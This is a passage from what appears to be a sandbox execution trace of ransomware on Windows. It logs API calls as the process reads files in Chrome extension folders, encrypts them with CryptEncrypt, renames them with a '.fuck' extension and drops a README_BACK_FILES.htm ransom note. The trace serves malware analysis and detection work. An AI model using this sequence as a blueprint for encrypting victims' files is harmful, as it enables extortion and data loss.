[0263.569] CryptEncrypt (in: hKey=0x2e7e780, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2e74a28*, pdwDataLen=0x2b9bc4c*=0x18, dwBufLen=0x80 | out: pbData=0x2e74a28*, pdwDataLen=0x2b9bc4c*=0x80) returned 1 [0263.569] WriteFile (in: hFile=0x5d60, lpBuffer=0x2e74a28*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x2e74a28*, lpNumberOfBytesWritten=0x2b9bc5c*=0x80, lpOverlapped=0x0) returned 1 [0263.570] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.571] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.571] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.593] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.593] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.594] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.594] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.594] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.594] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.594] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.594] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.594] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.595] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.595] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.595] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.595] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.595] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.595] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.595] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.596] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.596] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.596] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.596] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.596] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.596] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.597] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.597] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.597] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.597] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x380) returned 1 [0263.597] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x380, lpOverlapped=0x0) returned 1 [0263.597] ReadFile (in: hFile=0x5d5c, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9bc5c*=0x1a4, lpOverlapped=0x0) returned 1 [0263.597] CryptEncrypt (in: hKey=0x2e7da00, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1a4, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9bc5c*=0x1b0) returned 1 [0263.598] WriteFile (in: hFile=0x5d60, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x1b0, lpNumberOfBytesWritten=0x2b9bc5c, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9bc5c*=0x1b0, lpOverlapped=0x0) returned 1 [0263.598] CloseHandle (hObject=0x5d5c) returned 1 [0263.598] CloseHandle (hObject=0x5d60) returned 1 [0263.598] CopyFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), bFailIfExists=0) returned 1 [0263.600] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json", dwFileAttributes=0x0) returned 1 [0263.601] DeleteFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.gsg")) returned 1 [0263.602] MoveFileA (lpExistingFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json"), lpNewFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.fuck" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\messages.json.fuck")) returned 1 [0263.603] CryptDestroyHash (hHash=0x2e7fd40) returned 1 [0263.603] CryptDestroyKey (hKey=0x2e7da00) returned 1 [0263.603] CryptReleaseContext (hProv=0x2e7a500, dwFlags=0x0) returned 1 [0263.603] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0 [0263.603] FindClose (in: hFindFile=0x2e7fc40 | out: hFindFile=0x2e7fc40) returned 1 [0263.603] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\readme_back_files.htm")) returned 0xffffffff [0263.603] AreFileApisANSI () returned 1 [0263.603] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x275c330, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 162 [0263.603] CreateFileW (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\README_BACK_FILES.htm" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\mr\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9cecc, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d64 [0263.604] GetFileType (hFile=0x5d64) returned 0x1 [0263.604] WriteFile (in: hFile=0x5d64, lpBuffer=0x2b9bb18*, nNumberOfBytesToWrite=0x5ec, lpNumberOfBytesWritten=0x2b9bb10, lpOverlapped=0x0 | out: lpBuffer=0x2b9bb18*, lpNumberOfBytesWritten=0x2b9bb10*=0x5ec, lpOverlapped=0x0) returned 1 [0263.605] FindNextFileA (in: hFindFile=0x2e7fc00, lpFindFileData=0x2b9d0e4 | out: lpFindFileData=0x2b9d0e4) returned 1 [0263.605] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\*.*", lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 0x2e7fc40 [0263.606] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.606] FindNextFileA (in: hFindFile=0x2e7fc40, lpFindFileData=0x2b9cd48 | out: lpFindFileData=0x2b9cd48) returned 1 [0263.606] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9cc58 | out: lpSystemTimeAsFileTime=0x2b9cc58) [0263.606] GetLastError () returned 0x0 [0263.606] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json")) returned 0x20 [0263.607] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json", dwFileAttributes=0x80) returned 1 [0263.607] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ms\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d60 [0263.608] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User 